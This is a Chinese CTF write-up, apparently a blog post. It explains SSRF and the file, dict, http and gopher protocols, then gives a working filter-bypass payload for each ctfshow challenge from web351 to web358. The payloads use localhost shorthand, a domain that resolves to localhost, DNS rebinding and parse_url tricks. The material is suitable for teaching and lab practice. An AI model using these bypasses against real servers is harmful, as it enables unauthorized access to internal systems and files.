【SSRF漏洞】——http协议常见绕过

改变的确很难,但结果值得冒险

本文如有错误之处,还请各位师傅指正

一.ssrf概述

SSRF全称为Server-side Request Fogery,中文含义服务器端请求伪造

SSRF是一种由攻击者构造形成目标服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统(防火墙隔绝)。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)

原由:大都是由于服务端提供了从其它服务器获取数据的功能,比如使用户从指定的URL web应用获取图片、下载文件、读取文件内容等。但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发送请求,并返回对该目标地址请求的数据。

  • 判断是否为SSRF题目:题目源码出现以下函数file_get_contents()、curl()、fsocksopen()、fopen()
  • 时可能有SSRF
  • 常用协议:http://,file://,dict://,gopher://

二.curl会话

PHP中的cURL会话(cURL session)是通过cURL库提供的功能来进行HTTP请求的过程。cURL会话可以用于发送HTTP/HTTPS协议请求,获取服务器响应,并对请求和响应进行配置和处理。

支持的协议:dict file ftp ftps http https imap imaps ipfs ipns mqtt pop3 pop3s smb smbs smtp smtps telnet tftp

ssrf常用的四种协议包括 file,dict,http,gopher

  • file协议 ‌:用于进行任意文件读取,是SSRF中最简单的利用方式。通过指定文件路径(如file://开头),攻击者可以尝试读取服务器上的任何文件,包括敏感信息或配置文件。

  • http(s)协议‌:允许攻击者向目标发送HTTP请求,探测内网服务。由于GET请求的参数直接加在URL中,这使得探测那些使用GET请求的应用成为可能,进而进行内网探测和攻击。

  • dict协议 ‌:1.探测内网主机 2.探测端口的开放情况‌ 3.探测端口的指纹信息 4.执行命令

  • gopher(万金油)协议 ‌:gopher协议允许通过Telnet远程访问其他应用程序,并使得Internet上的所有Gopher客户程序能够与Internet上的所有已"注册"的Gopher服务器进行对话。‌此外,Gopher协议支持发出GET和POST请求,这使得它能够在ssrf(服务器端请求伪造)攻击中发挥重要作用,例如攻击内网的MySQl,FTP,Telnet,Redis,Mencache等,同时也可以进行GET、POST请求。

使用cURL会话进行HTTP请求的基本步骤如下:

  • 创建一个cURL会话句柄(curl_init)。
  • 设置需要的选项,如请求的URL、请求方法、请求头、请求体等(curl_setopt)。
  • 执行HTTP请求(curl_exec)。
  • 获取服务器响应(可选)。
  • 关闭cURL会话(curl_close)。

三.ctfshow之ssrf

web351:

使用dict协议查看哪个端口开放,来决定使用哪个协议:

url=dict://127.0.0.1:80成功回显,可以使用http协议

payload:url=127.0.0.1/flag.php

web352:

parse_url()函数:是用来解析一个URL并返回该URL的各个组成部分

  • scheme: URL的协议部分http/https等等
  • host: URL的主机名部分 //后的部分
  • port: URL的端口部分
  • user: URL的用户名部分 @前
  • pass: URL的密码部分 @前
  • path: URL的路径部分
  • query: URL的查询字符串部分
  • fragment: URL的锚点部分 #后
    payload:url=http://127.0.0.1/flag.php

web353:

不能出现127.0.的部分

payload:url=http://127.1/flag.php

还可以通过编码绕过:16进制,10进制,8进制

web354:

不能出现0和1

使用域名指向,http://sudo.cc指向1270.0.1

payload:url=http://sudo.cc/flag.php

web355:

payload:url=http://127.1/flag.php

web356:

linux中0也可以访问本地

payload:url=http://0/flag.php

web357:

gethostbyname()函数是Linux系统中用于获取主机名对应IP地址的函数之一。

get_file_contens()函数读取域名后返回目标攻击ip

filter_var函数来验证第一次返回真正IP地址的有效性,并且排除了私有IP范围(0.0.0.0/8、172.16.0.0/12和192.168.0.0/16)和保留IP范围(0.0.0.0/8和169.254.0.0/16。)。

这里采用 DNS rebinding**(DNS重新绑定攻击)绕过**

攻击重点在于DNS服务能够在两次DNS查询中返回不同的IP地址,第一次是真正的IP,第二次是攻击目标IP地址,甚至可以通过这种攻击方法绕过同源策略。

在这个网站注册账号:CEYE - Monitor service for security testing

得到一个域名和两个ip

注意重定向时,域名的使用:r.域名

payload:url=http://r.zxfpib.ceye.io/flag.php

web358:

preg_match('/^http:\/\/ctf\..*show$/i',$url)

^:表示正则匹配的开始

^http:\/\/ctf\.:以 http://ctf.开头

.*:匹配零个或任意个字符

$:匹配的结束表示

parse_url匹配的时候,@前的内容是user部分,#后的部分会被忽略

payload:url=http://ctf.@0/flag.php#show

或者 url=http://ctf.@0/flag.php?show

相关推荐
友友马9 分钟前
『 Linux 』网络层 - IP协议(一)
linux·网络·tcp/ip
弗锐土豆27 分钟前
工业生产安全-安全帽第二篇-用java语言看看opencv实现的目标检测使用过程
java·opencv·安全·检测·面部
码老白1 小时前
【老白学 Java】Warshipv2.0(二)
java·网络
安迁岚1 小时前
【SQL Server】华中农业大学空间数据库实验报告 实验三 数据操作
运维·服务器·数据库·sql·mysql
HackKong1 小时前
小白怎样入门网络安全?
网络·学习·安全·web安全·网络安全·黑客
打码人的日常分享1 小时前
商用密码应用安全性评估,密评整体方案,密评管理测评要求和指南,运维文档,软件项目安全设计相关文档合集(Word原件)
运维·安全·web安全·系统安全·规格说明书
爱吃奶酪的松鼠丶1 小时前
Web安全之XSS攻击的防范
安全·web安全·xss
东莞梦幻网络科技软件开发公司1 小时前
开发体育赛事直播平台防止数据泄露的技术安全方案
经验分享·安全
vmlogin虚拟多登浏览器2 小时前
虚拟浏览器可以应对哪些浏览器安全威胁?
服务器·网络·安全·跨境电商·防关联
澜世2 小时前
2024小迪安全基础入门第三课
网络·笔记·安全·网络安全